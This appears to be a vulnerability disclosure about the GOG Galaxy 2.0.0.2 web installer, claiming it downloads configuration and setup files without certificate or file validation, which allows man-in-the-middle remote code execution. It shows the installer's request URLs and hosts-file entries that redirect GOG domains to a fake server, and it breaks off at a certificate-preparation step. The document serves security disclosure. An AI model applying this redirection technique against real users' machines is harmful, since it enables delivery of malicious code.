GOG Galaxy 2.0.0.2
Local test environment: Windows 10
Launching the browser runs the risk of being hijacked by a man-in-the-middle and RCE!
SSL certificate not validated vulnerability = "RCE"
During the operation of the GOG installation package, it will actively initiate a pair to the specified server
[GET]
https://remote-config.gog.com/components/webinstaller?component_version=2.0.0
[GET] https://content-system.gog.com/open_link/download?path=/open/galaxy/client/setup_galaxy_2.0.88.15.exe
Network requests for files (to obtain configuration or update information via HTTPS). However, the problem is that the file acquisition process has a lack of security verification - the authenticity of the source is not verified, and the server's certificate is not verified.
Attackers can inject malicious webinstaller files into clients through DNS hijacking, man-in-the-middle attacks, etc. Further analysis revealed that the software downloaded, which could be used by attackers to trigger remote code execution (RCE).
The core issue of this vulnerability chain is: unauthorized remote files can be controlled + HTTPS certificate validation is missing + files lack security validation. This problem can be exploited remotely without the user being aware.
A host or virtual machine is required (acting as a user + a host or virtual machine (acting as a fake server.)
To make it simpler, the user's hosts file is directly tampered with, and the relevant domain name is directly resolved to the IP address of the fake server
192.168.146.1 remote-config.gog.com
192.168.146.1 content-system.gog.com
At the same time, the fake server also opened the corresponding service
✅ Step 1: Prepare the certificate